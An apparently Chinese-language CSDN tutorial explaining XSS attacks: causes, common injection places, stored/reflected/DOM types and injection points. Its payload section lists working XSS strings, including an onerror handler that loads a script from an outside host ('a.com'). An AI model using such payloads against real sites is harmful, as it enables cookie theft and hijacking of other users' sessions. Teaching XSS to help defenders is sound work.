XSS跨站脚本攻击

XSS跨站脚本攻击是由于网站未充分过滤用户输入,导致恶意代码执行,影响其他用户的安全。分为存储型、反射型和DOM型,其中存储型危害最大。攻击者利用XSS可以盗取用户cookie和资料。了解其原理、常见场景和分类对于提升网站安全性至关重要。
摘要由CSDN通过智能技术生成

XSS跨站脚本攻击

1.简介

XSS(Cross Site Scripting)跨站脚本攻击是利用系统对恶意用户的输入影响其他用户HTML的过滤不足,导致执行恶意用户的的代码.从而盗取用户cookie,用户资料等威胁.

2.整体框架

在这里插入图片描述

2.1XSS的发现与利用


2.1.1原理:网站未对用户的输入进行过滤

2.1.2常见场景:
		有回复框的地方都可能存在xss
1.搜索内容
2.发表文章的网页
3.邮件系统
4.留言,评论回复
2.1.3XSS分类:
存储型
反射型
DOM型

①存储型:
在所有类型的xss中存储型的危害是最大的,它存储在服务器当中,每次用户访问当前页面都会执行此xss.他可以被管理员看见,并且还可以提交内容.
②反射型
具体表现在我们把我们的恶意脚本通过url的方式传递给了服务器,而服务器则只是不加处理的把脚本“反射”回访问者的浏览器而使访问者的浏览器执行相应的脚本。也就是说想要触发漏洞,需要访问特定的链接才能够实现。
③DOM型
DOM—based XSS漏洞是基于文档对象模型Document Objeet Model,DOM)的一种漏洞。DOM是一个与平台、编程语言无关的接口,它允许程序或脚本动态地访问和更新文档内容、结构和样式,处理后的结果能够成为显示页面的一部分。DOM中有很多对象,其中一些是用户可以操纵的,如uRI,location,refelTer等。客户端的脚本程序可以通过DOM动态地检查和修改页面内容,它不依赖于提交数据到服务器端,而从客户端获得DOM中的数据在本地执行,如果DOM中的数据没有经过严格确认,就会产生DOM—based XSS漏洞。

2.1.4XSS常见playload:
<script>alert(1)</script>
<img src="http://abc/xss/a.js">
<img src=x onerror="s=createElement('script');body.appendChild(s);s.src='http://a.com/xss/probe.js' ";>

在这里插入图片描述

2.1.5XSS注入点:
在标签内<div>xss test</div>
在属性内:<input type="text" name="content" value="xss test" />
可以输入“x>xss test ”来进行测试
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值